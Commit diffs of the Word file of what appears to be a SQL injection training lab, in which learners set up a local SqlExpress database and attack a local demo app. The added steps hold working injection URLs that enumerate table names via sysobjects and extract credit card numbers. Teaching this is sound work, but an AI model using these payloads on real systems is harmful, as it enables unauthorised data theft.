<commit_message>
change connectionstring to sqlexpress
</commit_message>
<xml_diff>
--- a/lab-1-sql-Injection.docx
+++ b/lab-1-sql-Injection.docx
@@ -68,6 +68,155 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>-before</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Setup </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">your local </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SqlExpress</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Database</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SqlManagement</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Studio, Right-Click on the Databases node,  New Databases</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TourOfHeroes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2B2A01" wp14:editId="487B1739">
+            <wp:extent cx="3857625" cy="3494343"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3863114" cy="3499315"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Open de query: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>toh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>toh-db</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CreateTables.sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> execute it on your </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TourOfHeroes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> DB.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -101,7 +250,7 @@
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50754E11"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="D1C864C6"/>
+    <w:tmpl w:val="1068D8AE"/>
     <w:lvl w:ilvl="0" w:tplc="08090011">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>

</xml_diff>

<commit_message>
updat connectionstring to use sqlexpress and updated hands-on-lab
</commit_message>
<xml_diff>
--- a/lab-1-sql-Injection.docx
+++ b/lab-1-sql-Injection.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:body>
     <w:p>
       <w:r>
@@ -61,8 +61,6 @@
       <w:r>
         <w:t>toh</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -133,6 +131,10 @@
         <w:pStyle w:val="ListParagraph"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2B2A01" wp14:editId="487B1739">
             <wp:extent cx="3857625" cy="3494343"/>
@@ -340,7 +342,205 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Browse </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://localhost:4200/detail/2</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Enable developer tools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62843CE2" wp14:editId="26D14312">
+            <wp:extent cx="5731510" cy="4281805"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="4281805"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Query the tables of the database by using </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://localhost:4200/api/heroes?filter=id=(select+name+from+sysobjects+where+id=(select+top+1+id+from+(+select+top+</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:color w:val="FF0000"/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>+id+from+sysobjects+where+xtype=char(85)+order+by+id+asc+)+sq+order+by+id+desc))</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Vary the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>to query the tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Perform the attack =&gt; steal the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>creditcards</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://localhost:4200/api/heroes?filter=id=(select+top+1+%5bNumber%5d+from+creditcards)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -358,7 +558,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50754E11"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -455,7 +655,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -471,7 +671,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="375">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -843,10 +1043,6 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -901,7 +1097,7 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="UnresolvedMention">
+  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
     <w:name w:val="Unresolved Mention"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>

</xml_diff>